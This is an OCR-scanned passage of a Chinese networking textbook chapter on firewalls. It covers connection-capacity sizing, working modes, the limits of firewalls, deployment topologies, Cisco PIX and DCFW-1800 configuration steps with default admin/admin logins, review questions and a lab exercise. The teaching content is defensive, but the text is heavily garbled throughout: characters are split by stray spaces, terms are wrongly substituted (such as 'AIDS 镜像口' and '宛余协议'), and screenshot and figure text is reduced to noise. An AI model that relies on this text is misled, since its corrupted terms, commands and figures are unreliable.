速 链 路 根本 无 法 承载 太 多 的 并 发 连接 ,所 以 即便 是 防火 墙 能 够 支持 大 规模 的 并 发 访问 连接 ， 
也 无 法 发 挥 出 其 原 有 的 性 能 。 

鉴于 此 ,应 当 根据 网 络 环境 的 具体 情况 和 个 人 不 同 的 上 网 习惯 来 选择 适当 规模 的 并 发 
连接 表 。 因 为 不 同 规模 的 网 络 会 产生 大 小 不 同 的 并 发 连接 ,而 用 户 习惯 于 何 种 网 络 服务 以 
及 如 何 使 用 这 些 服务 ,同样 也 会 产生 不 同 的 并 发 连接 需求 。 高 并 发 连接 数 的 防火 墙 设备 通 
常 需要 客户 投资 更 多 的 设备 ,这 是 因为 并 发 连接 数 的 增 大 牵扯 到 数据 结构 CPU、 内 存 、 系 
统 总 线 和 网 络 接口 等 多 方面 因素 。 如 何在 合理 的 设备 投资 和 实际 上 所 能 提供 的 性 能 之 间 寻 
找 一 个 黄金 平衡 点 将 是 用 户 选择 产品 的 一 个 重要 任务 。 按 照 并 发 连接 数 来 衡量 方案 的 合理 
性 是 一 个 值得 推荐 的 办 法 。 

以 每 个 用 户 需要 10. 5 个 并 发 连接 来 计算 ,一 个 中 小 型 企业 网 络 (1000 个 信息 点 以 下 ， 
容纳 4 个 C 类 地 址 空间 ) 大 概 需 要 10. 5X 1000 — 10 500 个 并 发 连接 ,因此 支持 20 000 — 
30 000 最 大 并 发 连接 的 防火 墙 设备 便 可 以 满足 需求 ; 大 型 的 企 事业 单位 网 络 (比如 信息 点 
数 在 1000—10 000 之 间 ) 大 概 会 需要 105 000 个 并 发 连接 ,所 以 支持 100 000—120 000 最 大 
并 发 连接 的 防火 墙 就 可 以 满足 企业 的 实际 需要 ; 而 对 于 大 型 电信 运营 商 和 ISP 来 说 ,电信 
级 的 千 兆 防火 墙 (支持 120 000—200 000 个 并 发 连接 ) 则 是 恰当 的 选择 。 为 较 低 需 求 而 采用 
高 端的 防火 墙 设备 将 造成 用 户 投资 的 浪费 ,同样 为 较 高 的 客户 需求 而 采用 低 端 设备 将 无 法 
达到 预计 的 性 能 指标 。 利 用 网 络 整体 上 的 并 发 连接 需求 来 选择 适当 的 防火 墙 产 品 可 以 帮助 
用 户 快速 .准确 地 定位 所 需要 的 产品 ,避免 对 单纯 某 一 参数 “ 愈 大 愈 好 ”的 盲目 追求 ,缩短 设 
计 施 工 周期 ,节省 企业 的 开支 。 从 而 为 企业 实施 最 合理 的 安全 保护 方案 。 


7.4.3 工作 模式 


目前 的 防火 墙 都 具有 三 种 工作 模式 : 路 由 模式 、 透 明 模式 和 NAT 模式 。 
D 路 由 模式 ,网 络 防火 墙 类 似 于 一 台 路 由 器 转发 数据 包 , 将 接收 到 的 数据 包 的 源 
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MAC 地 址 替换 为 相应 接口 的 MAC 地 址 ,然后 转发 。 路 由 模式 适用 于 每 个 区 域 都 不 在 同一 
个 网 段 的 情况 。 和 路 由 器 一 样 ,防火 墙 的 每 个 接口 均 要 根据 区 域 规划 配置 IP 地 址 。 

(2) 透明 模式 ,防火 墙 过 滤 通 过 它 的 封包 ,而 不 会 修改 数据 包 包头 中 的 任何 源 或 目的 地 
信息 。 所 有 接口 运行 起 来 都 像 是 同一 网 络 中 的 一 部 分 。 此 时 ,防火 墙 的 作用 更 像 是 Layer 2 
交换 机 或 桥接 器 。 在 透明 模式 下 ,接口 的 IP 地 址 被 设置 为 0. 0. 0. 0, 防 火 墙 对 于 用 户 来 说 
是 可 视 的 或 “透明 ”的 。 

(3) NAT( 网 络 地 址 转换 ) 模 式 ,防火墙 的 作用 与 Layer 3 交换 机 (或 路 由 器 ) 相 似 , 将 绑 
定 到 外 网 区 段 的 IP 封包 包头 中 的 两 个 组 件 进行 转换 : 其 源 IP 地 址 和 源 端 口号 。 防 火 墙 用 
目的 地 区 段 接口 的 IP 地址 蔡 换 发 送 封包 的 主机 的 源 IP 地 址 。 另 外 , 它 用 另 一 个 防火 墙 生 
成 的 任意 端口 号 替换 源 端口 号 。 

(4) 混合 模式 ,防火 墙 既 存在 工作 在 路 由 模式 的 接口 (接口 具有 TP 地 址 ), 又 存在 工作 
在 透明 模式 的 接口 (接口 无 IP 地 址 ) 。 混 合 模式 主要 用 于 透明 模式 作 双 机 备份 的 情况 ,此 时 
启动 VRRP(virtual router redundancy protocol ,虚拟 路 由 宛 余 协议 ) 功 能 的 接口 需要 配置 
IP 地 址 ,其 他 接口 不 配置 IP 地 址 。 


7.4.4 接口 


防火 墙 的 接口 可 分 为 以 太 口 (10Mbps) ,快速 以 太 口 (100Mbps) ,前兆 以 太 口 (1000Mbps) 
3 种 类 型 。 防 火 墙 一 般 都 预先 设 有 内 网 口外 网 口 .DMZ 区 接口 和 默认 规则 ,有 的 防火 墙 也 预 
留 了 其 他 接口 用 于 用 户 自 定义 其 他 的 独立 保护 区 域 。 防 火 墙 上 的 RS-232 Console 口 主要 用 于 
初始 化 防火 墙 时 进行 基本 的 配置 或 用 于 系统 维护 。 另 外 ,有 的 防火 墙 还 可 能 提供 PCMCIA 插 
AIDS 镜像 口 ,高 可 用 性 接口 (HA) 等 ,这 些 是 根据 防火 墙 的 功能 来 决定 的 。 


7.4.5 用 户 数 限 制 


防火 墙 的 用 户 数 限制 分 为 固定 限制 用 户 数 和 无 用 户 数 限制 两 种 。 前 者 比如 SOHO 型 
防火 墙 一 般 支持 几 十 到 几 百 个 用 户 不 等 ,而 无 用 户 数 限制 大 多 用 于 大 的 部 门 或 公司 。 注 意 ， 
用 户 数 和 并 发 连接 数 是 完全 不 同 的 两 个 概念 ,并 发 连接 数 是 指 防火 墙 的 最 大 会 话 数 (或 进 
程 ), 每 个 用 户 可 以 在 一 个 时 间 里 产生 很 多 的 连接 ,在 购买 产品 时 要 区 分 这 两 个 概念 。 


7.4.6 VPN 支持 


虚拟 专用 网 络 (virtual private network,VPN) 可 以 理解 成 是 虚拟 出 来 的 企业 内 部 专 
线 。 它 可 以 通过 特殊 的 加 密 的 通信 协议 在 连接 在 Internet. 上 的 位 于 不 同 地 方 的 两 个 或 多 个 
企业 内 部 网 之 间 建 立 一 条 专 有 的 通信 线路 ,就 好 比 是 架设 了 一 条 专线 一 样 ,但 是 它 并 不 需要 
真正 地 去 铺设 光缆 之 类 的 物理 线路 。 这 就 好 比 去 电信 局 申请 专线 ,但 是 不 用 给 铺设 线路 的 
费用 ,也 不 用 购买 路 由 器 等 硬件 设备 。 目 前 , 绝 大 部 分 防火 墙 产品 都 支持 VPN 功能 ,但 也 
有 少 部 分 不 支持 ,建议 在 选 购 时 注意 此 参数 。 


7.4.7 安全 过 滤 带 宽 
安全 过 滤 带 宽 是 指 防火 墙 在 某 种 加 密 算法 标准 下 ,如 DES(56 位 ) 或 3DES(168 位 ) 下 
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的 整体 过 滤 性 能 。 它 是 相对 于 明文 带宽 提出 的 。 一 般 来 说 ,防火 墙 总 的 吞吐 量 越 大 ,其 对 应 
的 安全 过 滤 带 宽 越 高 。 


È 防火 墙 的 缺陷 


从 安全 的 范畴 而 言 , 防 火 墙 不 能 解决 所 有 问题 ,尤其 存在 以 下 几 个 方面 缺陷 。 

(1) 防火 墙 可 以 阻 断 攻击 ,但 不 能 消灭 攻击 源 .“ 各 扫 自 家 门 前 雪 , 不 管 他 人 瓦 上 霜 ”， 
就 是 目前 网 络 安全 的 现状 。 互 联网 上 病毒 .木马 .恶意 试探 等 攻击 行为 络绎 不 绝 , 设 置 得 当 
的 防火 墙 能 够 阻挡 它们 ,但 是 无 法 清除 攻击 源 。 即 使 防火 墙 进行 了 良好 的 设置 ,使 得 攻击 无 
法 穿 透 防火 墙 ,但 各 种 攻击 仍然 会 不 断 地 向 防火 墙 发 出 尝试 。 例 如 接 主 干 网 10Mbps 网 络 
带宽 的 某 站 点 ,其 日 常 流量 中 大 约 有 512Kbps 是 攻击 行为 。 那 么 ,即使 成 功 设置 了 防火 墙 ， 
这 512Kbps 的 攻击 流量 依然 不 会 有 丝毫 减少 。 

(2) 防火 墙 不 能 抵抗 最 新 的 未 设置 策略 的 攻击 漏洞 。 就 如 杀毒 软件 与 病毒 一 样 ,总 是 
先 出 现 病毒 ,杀毒 软件 经 过 分 析出 特征 码 后 加 入 到 病毒 库 内 才能 查 杀 。 防 火 墙 的 各 种 策略 ， 
也 是 在 该 攻击 方式 经 过 专家 分 析 后 给 出 其 特征 进而 设置 的 。 

(3) 防火 墙 的 并 发 连接 数 限制 容易 导致 拥塞 或 者 溢出 。 由 于 要 判断 处理 流 经 防火 墙 
的 每 一 个 包 , 因 此 防火 墙 在 某 些 流量 大 、 并 发 请 求 多 的 情况 下 ,很 容易 导致 拥塞 ,成 为 整个 网 
络 的 瓶颈 ,影响 性 能 。 而 当 防火 墙 溢出 的 时 候 , 整 个 防线 就 如 同 虚设 ,原本 被 禁止 的 连接 也 
能 从 容 通过 了 。 

(4) 防火 墙 对 服务 器 合法 开放 的 端口 的 攻击 大 多 无 法 阻止 。 某 些 情况 下 ,攻击 者 利用 
服务 器 提供 的 服务 进行 缺陷 攻击 。 例 如 利用 开放 了 3389 端口 取得 没 打 过 SP 补丁 的 
WIN2k 的 超级 权限 ,利用 ASP 程序 进行 脚本 攻击 等 。 由 于 其 行为 在 防火 墙 一 级 看 来 是 “ 合 
理 ” 和 “合法 ”的 ,因此 被 简单 地 放行 了 。 

(5) 防火 墙 对 待 内 部 主动 发 起 连接 的 攻击 一 般 无 法 阻止 。“ 外 紧 内 松 ? 是 一 般 局 域 网 络 
的 特点 。 或 许 一 道 严密 防守 的 防火 墙 内 部 的 网 络 是 一 片 混乱 。 通 过 社会 工程 学 发 送 带 木 马 
的 邮件 、 带 木马 的 URL 等 方式 ,然后 由 中 木马 的 机 器 主动 对 攻击 者 连接 ,将 铁 壁 一 样 的 防 
火 墙 瞬间 破坏 掉 。 另 外 ,防火 墙 内 部 各 主机 间 的 攻击 行为 ,防火 墙 也 只 有 如 旁观 者 一 样 冷 视 
而 爱 莫 能 助 。 

(6) 防火 墙 不 处 理 病毒 。 不 管 是 funlove 病毒 也 好 ,还 是 CIH 也 好 ,在 内 网 用 户 下 载 外 
网 的 带 毒 文件 的 时 候 , 防 火 墙 是 不 为 所 动 的 。 


0.6 防火 墙 部 署 与 配置 


7.6.1 防火 墙 的 部 署 


在 实际 应 用 中 ,网 络 环境 差异 性 较 大 ,并 且 各 种 产品 的 适用 范围 和 配置 方法 也 不 同 , 因 
此 部 署 防火 墙 的 步骤 与 方法 也 有 较 大 差异 。 本 节 只 讨论 防火 墙 部 署 中 的 共性 问题 。 
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1. 普通 企业 环境 


普通 企业 环境 是 最 为 普通 的 企业 环境 防火 墙 部 署 案例 。 利 用 防火 墙 将 网 络 分 为 三 个 安 
全 区 域 : 企业 内 部 网 络 、 外 部 网 络 和 服务 器 专 网 (DMZ 区 )。 内 部 网 络 一 般 采 用 私有 的 TP 
地 址 ,DMZ 的 服务 器 可 以 采用 公 网 地 址 ,也 可 以 采用 私有 地 址 ,但 是 需要 在 防火 墙 上 做 相应 
的 地 址 转换 来 保证 外 部 用 户 对 服务 器 的 正常 访问 。 一 般 常 用 的 安全 策略 : 外 部 网 络 不 允许 
访问 内 部 网 络 , 内 部 网 络 用 户 可 以 根据 不 同 的 权限 访问 Internet; 内 部 用 户 和 外 部 用 户 只 多 
许 访问 DMZ 区 指定 服务 器 的 指定 服务 。 具 体 环境 如 图 7-12 所 示 。 


2. ADSL 接 入 的 部 署 


ADSL 接 人 是 一 种 经 济 实惠 的 Internet 接 人 方式 ,防火 墙 提供 了 对 ADSL 接 入 ,也 就 是 
PPPoE 拨号 的 支持 。 用 防火 墙 代替 原 有 的 拨号 客户 端 来 连接 ADSL Modem, 实 现 自动 拨 
号 的 功能 ,可 以 配置 防火 墙 自动 做 一 条 动态 的 地 址 转换 ,实现 内 部 的 多 个 用 户 通过 一 条 
ADSL 实现 对 互联 网 的 访问 。 这 样 防火 墙 配置 的 一 般 策略 为 只 允许 内 部 网 络 访问 外 部 网 络 
的 指定 服务 。 具 体 的 环境 如 图 7-13 所 示 。 
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图 7-12 普通 企业 部 署 图 7-13 ADSL 接 和 的 部 署 


3. 网 络 多 出 口 部 署 


我 们 经 常会 碰 到 企业 的 局 域 网 有 多 个 出 口 ,比如 Internet 出 口 ,总 部 出 口 等 。 防 火 墙 支 
持 将 DMZ 接口 作为 一 个 外 网 接口 ,支持 多 出 口 的 接 入 。 例 如 可 以 将 防火 墙 的 外 网 口 接 
Internet 接 人 服务 器 ,将 DMZ 口 接 入 总 部 接 入 的 服务 器 ,利用 路 由 的 选择 来 分 流 去 往 两 个 
区 域 的 流量 ,可 以 将 默认 的 网 关 指 向 Internet 处 的 路 由 器 ,添加 相应 的 去 往 总 部 网 络 方向 的 
路 由 策略 。 然 后 针对 不 同 的 网 络 之 间 的 数据 通信 ,采用 相应 的 安全 策略 。 另 外 的 一 种 多 出 
口 的 接 人 方式 也 可 以 两 个 防火 墙 的 方式 ,分 别 对 于 与 相应 的 链 路 ,这 种 方式 也 可 以 利用 路 由 
的 选择 来 实现 。 具 体 环境 如 图 7-14. FE 7-15 Bros 


4. 分 布 式 网 络 环境 的 部 署 


分 布 式 的 环境 一 般 分 为 一 个 中 心 节点 和 多 个 分 支 节点 ,防火 墙 支持 对 这 种 结构 的 整体 
的 配置 。 一 般 来 说 ,中 心 节点 采用 性 能 高 的 防火 墙 ,可 以 采用 双 机 热 备份 的 模式 ,保证 网 络 
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图 7-14 单 台 防 火 墙 实现 多 出 口 的 接 入 
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图 7-15 两 台 防火 墙 实现 多 出 口 的 接 入 


的 可 靠 性 ; 对 于 较 大 的 有 专线 接 入 的 分 支 节点 ,可 以 采用 防火 墙 ,一 方面 保证 该 分 支 网 络 的 
边界 安全 , 另 一 方面 也 可 以 通过 VPN 功能 实现 与 总 部 的 信息 通信 的 安全 ; 对 于 没有 专线 的 
分 支 节点 ,可 以 采用 防火 墙 自 带 的 对 子 网 拨号 的 VPN 功能 ,也 能 够 实现 与 总 部 之 间 的 安全 


通信 。 具 体 环境 如 图 7-16 所 示 。 
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图 7-16 防火 墙 分 布 式 网 络 环境 部 署 
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7.6.2 防火墙 的 配置 


防火 墙 的 配置 方法 不 是 千篇一律 的 ,不 要 说 不 同 品牌 ,就 是 同一 品牌 的 不 同型 号 也 不 完 
全 一 样 , 所 以 在 此 只 能 对 一 些 通用 防火 墙 配置 方法 作 一 基本 介绍 。 同 时 ,具体 的 防火 墙 策略 
配置 会 因 具体 的 应 用 环境 不 同 而 有 较 大 区 别 。 首 先 介绍 一 些 共性 的 配置 原则 。 


1. 防火 墙 的 基本 配置 原则 


默认 情况 下 ,所 有 的 防火 墙 都 是 按 以 下 两 种 情况 配置 的 。 

。 拒绝 所 有 的 流量 ,需要 在 网 络 中 特殊 指定 能 够 进入 和 出 去 的 流量 的 一 些 类 型 。 

。 允许 所 有 的 流量 ,这 种 情况 需要 特殊 指定 要 拒绝 的 流量 的 类 型 。 可 论证 地 ,大 多 数 

防火 墙 默认 都 是 拒绝 所 有 的 流量 作为 安全 选项 。 一 旦 安装 防火 墙 后 ,需要 打开 一 些 
必要 的 端口 来 使 防火 墙 内 的 用 户 在 通过 验证 之 后 可 以 访问 系统 。 换 句 话说 ,如 果 想 
让 员工 们 能 够 发 送 和 接收 E-mail. 必须 在 防火 墙 上 设置 相应 的 规则 或 开启 允许 
POP3 和 SMTP 的 进程 。 

在 防火 墙 的 配置 中 ,首先 要 遵循 的 原则 就 是 安全 实用 ,从 这 个 角度 考虑 ,在 防火 墙 的 配 
置 过 程 中 需 坚持 以 下 三 个 基本 原则 。 

D 简单 实用 : 对 防火 墙 环境 设计 来 讲 , 首 要 的 就 是 越 简单 越 好 。 其 实 这 也 是 任何 事 
物 的 基本 原则 。 越 简单 的 实现 方式 , 越 容易 理解 和 使 用 。 而 且 是 设计 越 简单 , 越 不 容易 出 
错 , 防 火 墙 的 安全 功能 越 容易 得 到 保证 ,管理 也 越 可 靠 和 简便 。 

每 种 产品 在 开发 前 都 会 有 其 主要 功能 定位 ,比如 防火 墙 产品 的 初衷 就 是 实现 网 络 之 间 
的 安全 控制 ,入 侵 检 测 产品 主要 针对 网 络 非法 行为 进行 监控 。 但 是 随 着 技术 的 成 熟 和 发 展 ， 
这 些 产品 在 原来 的 主要 功能 之 外 或 多 或 少 地 增加 了 一 些 增值 功能 ,比如 在 防火 墙 上 增加 了 
查 杀 病毒 .人 侵 检 测 等 功能 ,在 入侵 检测 上 增加 了 病毒 查 杀 功能 。 但 是 这 些 增值 功能 并 不 是 
所 有 应 用 环境 都 需要 ,可 针对 具体 应 用 环境 进行 配置 ,不 必 对 每 一 功能 都 详细 配置 ,这 样 一 
则 会 大 大 增强 配置 难度 ,同时 还 可 能 因 各 方面 配置 不 协调 ,引起 新 的 安全 漏洞 ,得 不 偿 失 。 

(2) 全 面 深 入 : 单一 的 防御 措施 是 难以 保障 系统 的 安全 的 ,只 有 采用 全 面 的 多 层次 的 
深层 防御 战略 体系 才能 实现 系统 的 真正 安全 。 在 防火 墙 配置 中 ,不 要 停留 在 几 个 表面 的 防 
火 墙 语句 上 ,而 应 系统 地 看 整个 网 络 的 安全 防护 体系 ,尽量 使 各 方面 的 配置 相互 加 强 ,从 深 
层次 上 防护 整个 系统 。 这 可 以 体现 在 两 个 方面 : 一 方面 体现 在 防火 墙 系统 的 部 署 上 ,多 层 
次 的 防火 墙 部 署 体 系 , 即 采用 集 互 联网 边界 防火 墙 、 部 门 边界 防火 墙 和 主机 防火 墙 于 一 体 的 
层次 防御 ; 另 一 方面 将 人 侵 检测 、 网 络 加 密 、 病 毒 查 杀 等 多 种 安全 措施 结合 在 一 起 的 多 层 
安全 体系 。 

(3) 内 外 兼顾 防火 墙 的 一 个 特点 是 防 外 不 防 内 ,其 实在 现实 的 网 络 环境 中 ,80% 以 上 
的 威胁 都 来 自 内 部 ,所 以 要 树立 防 内 的 观念 ,从 根本 上 改变 过 去 那 种 防 外 不 防 内 的 传统 观 
念 。 对 内 部 威胁 可 以 采取 其 他 安全 措施 ,比如 入 侵 检测 .主机 防护 .漏洞 扫描 病毒 查 杀 。 这 
体现 在 防火 墙 配置 方面 就 是 要 引入 全 面 防护 的 观念 ,最 好 能 部 署 与 上 述 内 部 防护 手段 一 起 
联动 的 机 制 。 


2. 防火 墙 的 初始 配置 


像 路 由 器 一 样 ,在 使 用 之 前 ,防火 墙 也 需要 经 过 基本 的 初始 配置 。 各 种 防火 墙 的 初始 配 
置 基本 类 似 , 所 以 在 此 仅 以 Cisco PIX 防火 墙 为 例 进行 介绍 。 

防火 墙 的 初始 配置 也 是 通过 控制 端口 (Console) 与 PC 的 串口 连接 ,再 通过 Windows 系 
统 自 带 的 超级 终端 (HyperTerminal) 程 序 进 行 选项 配置 。 

防火 墙 除了 通过 Console 进行 初始 配置 外 ,也 可 以 通过 Telnet 和 TFTP 配置 方式 进行 
高 级 配置 ,但 Telnet 配置 方式 都 是 在 命令 方式 中 配置 ,难度 较 大 ,而 TFTP 方式 需要 专用 的 
TFTP 服务 器 软件 ,但 配置 界面 比较 友好 。 

防火 墙 与 路 由 器 一 样 也 有 四 种 用 户 配置 模式 , 即 普通 模式 (unprivileged mode) ,特权 模 
式 (privileged mode) .配置 模式 (configuration mode) 和 端口 模式 (interface mode) ,进入 这 
四 种 用 户 模式 的 命令 也 与 路 由 器 一 样 。 

普通 用 户 模式 无 须 特别 命令 ,启动 后 即 进入 ; 进入 特权 用 户 模式 的 命令 为 “enable”; 进 
人 配置 模式 的 命令 为 “config terminal”; 进入 端口 模式 的 命令 为 "interface ethernet * ”。 不 
过 因为 防火 墙 的 端口 没有 路 由 器 那么 复杂 ,所 以 通常 把 端口 模式 归 为 配置 模式 ,统称 为 “全 
局 配置 模式 ”。 

防火 墙 的 具体 配置 步骤 如 下 。 

(1) 将 防火 墙 的 Console 端口 用 一 条 防火 墙 自 带 的 串 行 电缆 连接 到 计算 机 的 一 个 串 
EE. 

(2) 打开 PIX 防火 墙 电源 ,让 系统 加 电 初始 化 ,然后 开启 与 防火 墙 连接 的 主机 。 

(3) 运行 Windows 系统 中 的 超级 终端 程序 。 对 超级 终端 的 配置 与 交换 机 或 路 由 器 的 
配置 一 样 。 

(4) 当 防 火 墙 进入 系统 后 即 显示 “pixfirewall 之 ”的 提示 符 , 证 明 防 火 墙 已 启动 成 功 , 进 
入 用 户 模式 。 

(5) 输入 命令 : enable, 进 入 特权 用 户 模式 ,此 时 系统 提示 为 : pixfirewall# 。 

(6) 输入 命令 : configure terminal, 进 入 全 局 配置 模式 ,进行 初始 化 设置 。 

(7) 配置 保存 : wr mem, 

(8) 输入 命令 : exit, 退 出 当前 模式 。 可 在 任何 用 户 模式 下 执行 ,方法 简单 ,只 输入 命令 
本 身 即 可 。 下 面 三 条 语句 表示 了 用 户 从 配置 模式 退 到 特权 模式 ,再 退 到 普通 模式 下 的 操作 
步骤 。 


pixfirewall(config) # exit 

pixfirewall£ exit 

pixfirewall« 

C9) 输入 命令 : show, 查 看 当前 用 户 模式 下 的 所 有 可 用 命令 。 

(10) 输入 命令 : show interface, 在 特权 用 户 模式 下 查看 端口 状态 ,显示 防火 墙 所 有 接 
口 配置 情况 。 
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- 什么 是 防火 墙 ? 防火 墙 由 几 部 分 构成 ? 
. 防火 墙 的 基本 功能 是 什么 ? 
.防火墙 的 经 典 体系 结构 有 哪些 ?简要 说 明 它 们 的 优 缺 点 。 
.防火 墙 规则 的 处 理 方式 中 ,Reject 和 Drop 有 何 区 别 ? 
.防火墙 的 两 条 默认 准则 是 什么 ? 
. 简 述 路 由 器 与 堡垒 主机 上 的 信息 流向 的 区 别 。 

7. 在 内 部 、 外 部 网 络 之 间架 设 一 台 路 由 器 ,其 外 部 网 卡 IP 地 址 为 202. 101. 111. 99 ,内 
部 网 络 的 网 络 地 址 为 202. 101. 100. 0/255. 255. 255. 0 ,路 由 器 的 内 部 网 卡 IP 地 址 为 202. 
101.100.1。 根 据 以 下 要 求 完成 对 路 由 器 的 数据 包 过 滤 规 则 的 设置 。 

QD 要 禁止 UDP 数据 包 在 内 部 、 外 部 网 络 之 间 的 传递 。 

@ 人 允许 外 部 网 络 访问 内 网 的 WWW、FTP 服务 器 ,但 要 禁止 其 他 基于 TCP 的 服务 。 

8. 在 Windows 环境 下 配置 与 应 用 360 个 人 防火 墙 。 


G 7.1 防火 墙 管理 环境 配置 
【 实 训 目 的 】 


学 会 使 用 超级 终端 .Telnet\SSH , WebUI 方式 登录 防火 墙 ; 掌握 防火 墙 管理 环境 的 拱 
建 和 配置 方法 ; 熟练 掌握 防火 墙 的 路 由 模式 配置 ,拓扑 结构 如 图 7-17 所 示 , 配置 流程 如 


AT 所 示 。 
Go 


202.101.1.254 


c» c 4s c t n 


WWW 10.1.1.1 


202.101.1.253 


í 10.1.1.254 
192.168.1.254 
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192.168.1.1 192.168.1.2 


图 7-17 防火 墙 路 由 模式 拓扑 


DNS 10.1.1.2 


E-mail 10.1.1.3 


FTP 10.1.1.4 
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表 7-1 防火 墙 路 由 模式 配置 流程 


配置 流程 界面 配置 路 径 命令 行 
CD 配置 端口 防火 墙 一 端口 设置 ifconfig 
@ 设置 默认 路 由 防火 墙 一 端口 设置 -默认 网 关 route add default 
@ 增加 管理 主机 地 址 防火 墙 习 端口 设置 防火 墙 管 理 员 IP 一 修改 adminhost add 
O 设置 网 络 对 象 网 络 对 象 -新 增 netobj add 
@ 设置 安全 规则 安全 规则 一 新 增 policy add 
© 设置 NAT NAT nat add 
© 应 用 应 用 apply 
& 保存 保存 save 

【 实 训 环境 】 


CD. V2 防火 墙 使 用 Telnet\SSH、WebUI 方 式 进行 管理 ,使 用 者 可 以 很 方便 地 使 用 几 
种 方式 进行 管理 。 

(2) 实 训 设备 DCFW-1800E-V2 防火 墙 , 软 件 版 本 为 DCFOS-2. 0R4。 防 火 墙 设备 1 
台 ,Console 线 1 条 ,交叉 网 络 线 1 条 ,PC1 台 。 

1. 配置 PC 的 超级 终端 属性 , 接 入 防火 墙 命令 行 模式 


(1) 登录 防火 墙 并 熟悉 各 配置 模式 。 默 认 管 理 员 用 户口 令 和 密码 是 ， 


login: admin 
password: admin 


输入 如 上 信息 ,可 进入 防火 墙 的 执行 模式 ,该 模式 的 提示 符 如 下 所 示 , 包 含 了 一 个 数字 
HICH): 


DCEW- 1800 
在 执行 模式 下 ,输入 configure 命令 ,可 进入 全 局 配置 模式 。 提 示 符 如 下 所 示 : 
DCEW - 1800 (config) & 


V2 系列 防火 墙 的 不 同 模块 功能 需要 在 其 对 应 的 命令 行 子 模块 模式 下 进行 配置 。 在 全 
局 配置 模式 输入 特定 的 命令 可 以 进入 相应 的 子 模块 配置 模式 。 例 如 ， 行 interface 
ethernet0/0 命令 进入 ethernet0/0 接口 配置 模式 ,此 时 的 提示 符 变 更 为 : 


DCFW - 1800 (config - if - eth0/0) # 
表 7-2 列 出 了 常用 的 模式 间 切换 的 命令 。 
表 7-2 模式 与 命令 切换 


模 x *$ 3$ 
执行 模式 到 全 局 配置 模式 config 
全 局 配置 模式 到 子 模块 配置 模式 不 同 功能 使 用 不 同 的 命令 进入 各 自 的 命令 配置 模式 


返回 到 上 一 级 命令 模式 
从 任何 模式 退回 到 执行 模式 


exit 


end 
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(2) 通过 PC 测试 与 防火 墙 的 连通 性 。 使 用 交叉 双 绞 线 连接 防火 墙 和 PC ,此 时 防火 墙 
的 LAN-link 灯亮 起 ,表明 网 络 的 物理 连接 已 经 建立 。 观 察 指示 灯 状 态 为 内 烁 ,表明 有 数据 
在 尝试 传输 。 

此 时 打开 PC 的 连接 状态 ,发 现 只 有 数据 发 送 ,没有 接收 到 的 数据 ,这 是 因为 防火 墙 的 
端口 默认 状态 下 都 会 禁止 向 未 经 验证 和 配置 的 设备 发 送 数据 ,保证 数据 的 安全 。 


2. 搭建 Telnet 管理 环境 


(1) 运行 manage telnet 命令 开启 被 连接 接口 的 Telnet 管理 功能 。 


Hostname £ configure 

DCFW - 1800 (config) # interface Ethernet 0/0 

DCFW - 1800 (config - if - eth0/0) # manage telnet 

(2) 配置 PCI ff] IP 地 址 为 192. 168. 1. 1, 从 PCI 尝试 与 防火 墙 的 Telnet 连接 。 
i£: 用 户口 令 和 密码 是 默认 管理 员 用 户口 令 和 密码 : admin, 如 图 7-18 所 示 。 


[和 
xir REV FEV suc sm Ww 


Gis] 
né 53555 
SPARD: (9600 E 
BERD: 6 Aj 
[— € Welcome to Digital China DCFH (C) 
ZARAD: X s Copyright 2003 Digital China, A11 rights reserved 
pisce acrem http://networks.digitalchina.com 
Biz: | vi 
BASH. X *| login: 
CAED] 


KI 7-18 Telnet 管理 


3. 搭建 WebUl 管理 环境 


初次 使 用 防火 墙 ,必须 先 配 置 WebUI 管理 防火 墙 的 环境 ,端口 ,默认 路 由 、 管 理 主机 地 
址 (参考 表 7-1 中 @@), 如 图 7-19、 图 7-20 所 示 。 然 后 ,在 浏览 器 地 址 栏 中 输入 https:// 
192.168. 1.254: 1211 即 可 。 


DCFW1800 — 起 级 终端 
XPD SO EV TUO HV WO 
ne s3 apg 


# ifconfig if8 202.101.1.253/24 
# ifconfig ifl 192.168.1.254/24 
W ifconfig if2 10.1.1.254/24 

W route add default 202.101.1.254 
# adminhost add 192.168.1.1 

# apply 

H save. 


图 7-19 命令 配置 管理 环境 
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图 7-20 WebUI 配 置 管理 环境 
4. 设置 网 络 对 象 
参考 表 7-1 中 的 图 ,网络 对 象 设置 的 WebUI 管理 界面 配置 如 图 7-21 一 图 7-25 所 示 。 
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E721 设置 网 络 对 象 
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7-22 增加 主机 对 象 
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图 7-23 增加 网 络 对 象 


0.0.0.0 132.168.1.254 any internal(exclude dmz) 
2552552652655 102.168.1254 

' "88256258256 192.168.1254 

un: T. 

= “255 255 755.255 192. " 


anvinternal 
T 


Im 
pez 


10.11.254 
255285255255 “10,11.254 
255.255.255 55 ; 

"255255250256 - 

ESL 


any dm: 


10.11.254 


图 7-25 增加 DMZ 接口 的 网 络 对 象 


5. 设置 安全 规则 


参考 表 1-1 中 的 @ ,安全 规则 设置 的 WebUI 管理 界面 配置 如 图 7-26— [8 7-34 所 示 。 
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图 7-26 设置 安全 规则 
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7-97. 允许 LAN 访问 外 部 网 络 (TCP) 
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图 7-28 允许 LAN 访问 外 部 网 络 (UDP) 
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图 7-29 允许 LAN 访问 外 部 网 络 (Ping) 
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图 7-31 增加 进 DMZ 的 安全 规则 (1) 


Fe 


Qus 
图 7-32 增加 进 DMZ 的 安全 规则 (2) 


Jum. 


图 7-33 增加 出 DMZ 的 安全 规则 
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图 7-34 完成 后 的 安全 规则 


6. 管理 用 户 的 设置 

V2 防火 堵 默 认 的 管理 员 是 admin, 可 以 对 其 进行 修改 ,但 不 能 删除 这 个 管理 员 。 
增加 一 个 管理 员 的 命令 是 : 

DCFW - 1800 (config) admin user user - nane 


执行 该 命令 后 ,系统 创建 指定 名 称 的 管理 员 , 并 且 进 入 管理 员 配 置 模式 ;如 果 指 定 的 管 
理 员 名 称 已 经 存在 , 则 直接 进入 管理 员 配 置 模式 。 


管理 员 特 权 为 管理 员 登 录 设备 后 拥有 的 权限 。DCFOS 允许 的 权限 有 RX 和 RXW 
两 种 。 


在 管理 员 配 置 模式 下 ,输入 以 下 命令 配置 管理 员 的 特权 : 
DCFW - 1800 (config - admin) # privilege {RX | RXW) 
在 管理 员 配 置 模式 下 ,输入 以 下 命令 配置 管理 员 的 密码 : 


DCFW - 1800 (config - admin) # password password 


7. 将 防火 墙 配置 恢复 到 出 厂 配置 


将 防火 墙 恢复 到 出 厂 配置 的 方法 如 下 。 

。 使 用 设备 上 的 CRL 键 使 系统 恢复 到 出 厂 配置 。 

